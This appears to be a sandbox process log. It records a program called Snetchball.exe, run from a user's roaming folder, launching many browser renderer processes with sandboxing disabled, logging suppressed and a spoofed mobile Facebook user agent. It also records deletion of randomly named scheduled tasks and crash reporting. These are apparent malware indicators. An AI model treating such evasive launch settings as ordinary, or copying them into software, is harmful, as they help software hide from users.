"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=1196 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2500 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,18104124565455389380,13213101510209559202,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=4508 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=4164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --mojo-platform-channel-handle=4404 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,1948266600832568998,12638398276600011796,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --mojo-platform-channel-handle=4392 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=4288 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=4428 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=4264 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "wDjRE1"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2984 -ip 2984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2984 -s 2064
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=4280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=4304 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=4488 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=4292 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --mojo-platform-channel-handle=1196 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --mojo-platform-channel-handle=4104 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=4404 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=4364 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=4448 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=4084 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=1200 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=4312 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=2588 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
